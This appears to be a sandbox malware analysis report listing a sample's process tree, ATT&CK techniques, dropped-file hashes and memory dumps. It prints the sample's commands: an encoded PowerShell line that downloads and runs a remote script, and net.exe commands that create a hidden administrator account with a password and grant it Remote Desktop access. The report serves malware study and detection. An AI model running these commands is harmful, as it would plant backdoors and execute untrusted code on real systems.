    PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:100

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc hAMh1tfC
1⤵
PID:4336

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc hAMh1tfC
1⤵
PID:2396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3740

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:696

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:5016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" ZHCNTALV$ /ADD
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" ZHCNTALV$ /ADD
1⤵
PID:3704

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" ZHCNTALV$ /ADD
1⤵
PID:3724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:3860

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:3876

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc hAMh1tfC /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4452

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3076

C:\Windows\system32\net.exe
net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:1592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4lsoqffq\4lsoqffq.dll

Filesize
3KB

MD5
42d0b18b8b91e0479c85230b1d4d522f

SHA1
8cd8327b91f7a8e7fa529cf07d24e1866296fc15

SHA256
9161381a422d05a87b8586422fb42685dee13143d37f0d2059cc31ac35dbecfd

SHA512
ad25b66a83e76671b6ffaa027460e65926ecbd5be688a01838ae43f42287b2d01058b2023a3e06f61123e80bb5f1e6a9618a873cb645037b0070dee49fd26dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5A26.tmp

Filesize
1KB

MD5
047d2aa38c999b1c4fa70ec525e992fb

SHA1
2608a709ccc2bc96222fa736a530ffe358c94061

SHA256
e9b54b672cd58e6696dd7265d63a5d6b2b2013fe0aaca03b79f09dadb9f000af

SHA512
cac945bdd0fda599322eda894391293d3fe9ae818f43ed191e9200f2ea0e54a9c60d9a1e51e326d71bcfe4b2315edea81003125e3d38fd76cfdb50a00bc90642

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwpzha5q.lmn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
600KB

MD5
80e5b18ff3cdaa55ee4c5bbb7636bcc6

SHA1
c3b6ff95d0933fb9e7ee354895f4115b989d6317

SHA256
0cbb7c70844646fc018c34b5290f8e7ae5a3bcd8eebe6df0cb9327cbf8cba8e6

SHA512
7871de96e0321cd7d8f8ae9e83d3feb1cd7f564413783dc6fa367e53667057dd84a993bdf47706fda95b16e34f528326b8fa69a19c3bc1b5ae23786c25e31dc4

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
615f99f0e93e2cc4c6a3a572835fd63d

SHA1
c383f93e9a47adc4d4b265fadfcc3feaf0980a91

SHA256
bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8

SHA512
dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
261KB

MD5
34c8e7e6d2a45e3d3eff8eb550e55abc

SHA1
c3083237456bd50d28ad14dac563df9a1942a3f5

SHA256
1d994ff51e3d0a70415d0f4f46e155bebc9b7eb9f7485ee0902c823f79646a71

SHA512
1e50a74a472db6b719116b45ba11e628594ced903739fa193c63de9421713a02b29278f1d139dd3bd4ac6e13bd261051c0a69ac6a114ef62d0645306afe47ebf

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7A41.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lsoqffq\4lsoqffq.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lsoqffq\4lsoqffq.cmdline

Filesize
369B

MD5
7c227fb2ea254437a54c1929c0d06f1e

SHA1
55ce96b07e0671b5071a239903ed57cdba63059e

SHA256
1b6cc92eb71fbc3b7c54de7b98df36ce797e8aecd58bcda4be600a4b4abedff1

SHA512
fccaab233de8bd81b71bc9229d0489784792b9fcfefcf7199c65981eced014c7c4591ce30b013a869a742f34f35594b6c1413a64461158eb2345d6bb09c1f12a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lsoqffq\CSC4D76EC373C1A4FAAA59D2B6DB090E790.TMP

Filesize
652B

MD5
2ce011e40fafb7abf652bf3e47f52be9

SHA1
6917703a6afa6a2ddc94dd68e2b18b31b7efd36a

SHA256
37173639fdc533266ecea3006fb05ae74d7539e349fa9cfbc655ba81f551062a

SHA512
57f1684aac9eeab190c1c5b193b2fad1cd0922d8051bd3c4449d23169f6718874cb78e4cb8e16f3b6bb2c506006b14c0e5d3f2dcff05479dd4eb8cdc3f057cbc

Download Submit
memory/2540-117-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-149-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-35-0x0000019E51CF0000-0x0000019E51CF8000-memory.dmp

Filesize
32KB

Download
memory/2540-8-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/2540-11-0x0000019E51960000-0x0000019E51982000-memory.dmp

Filesize
136KB

Download
memory/2540-9-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-10-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-38-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-39-0x0000019E51EC0000-0x0000019E52036000-memory.dmp

Filesize
1.5MB

Download
memory/2540-40-0x0000019E52250000-0x0000019E5245A000-memory.dmp

Filesize
2.0MB

Download
memory/2540-116-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/2540-24-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-157-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/2540-156-0x00007FF921A20000-0x00007FF921A39000-memory.dmp

Filesize
100KB

Download
memory/2540-105-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2540-81-0x00007FF921A20000-0x00007FF921A39000-memory.dmp

Filesize
100KB

Download
memory/2540-118-0x0000019E51850000-0x0000019E51860000-memory.dmp

Filesize
64KB

Download
memory/2620-4-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-3-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-101-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-102-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-103-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-80-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/2620-0-0x0000022C19410000-0x0000022C19836000-memory.dmp

Filesize
4.1MB

Download
memory/2620-1-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/2620-2-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-5-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-104-0x0000022C7FAC0000-0x0000022C7FAD0000-memory.dmp

Filesize
64KB

Download
memory/2620-159-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/3288-52-0x00000200EBA40000-0x00000200EBA50000-memory.dmp

Filesize
64KB

Download
memory/3288-53-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/3288-50-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/3288-51-0x00000200EBA40000-0x00000200EBA50000-memory.dmp

Filesize
64KB

Download
memory/3968-65-0x000002D5EEF40000-0x000002D5EEF50000-memory.dmp

Filesize
64KB

Download
memory/3968-66-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/3968-63-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/3968-64-0x000002D5EEF40000-0x000002D5EEF50000-memory.dmp

Filesize
64KB

Download
memory/4364-67-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/4364-77-0x00000211446F0000-0x0000021144700000-memory.dmp

Filesize
64KB

Download
memory/4364-78-0x00000211446F0000-0x0000021144700000-memory.dmp

Filesize
64KB

Download
memory/4364-79-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/4460-152-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download
memory/4460-115-0x00007FF913BB0000-0x00007FF914671000-memory.dmp

Filesize
10.8MB

Download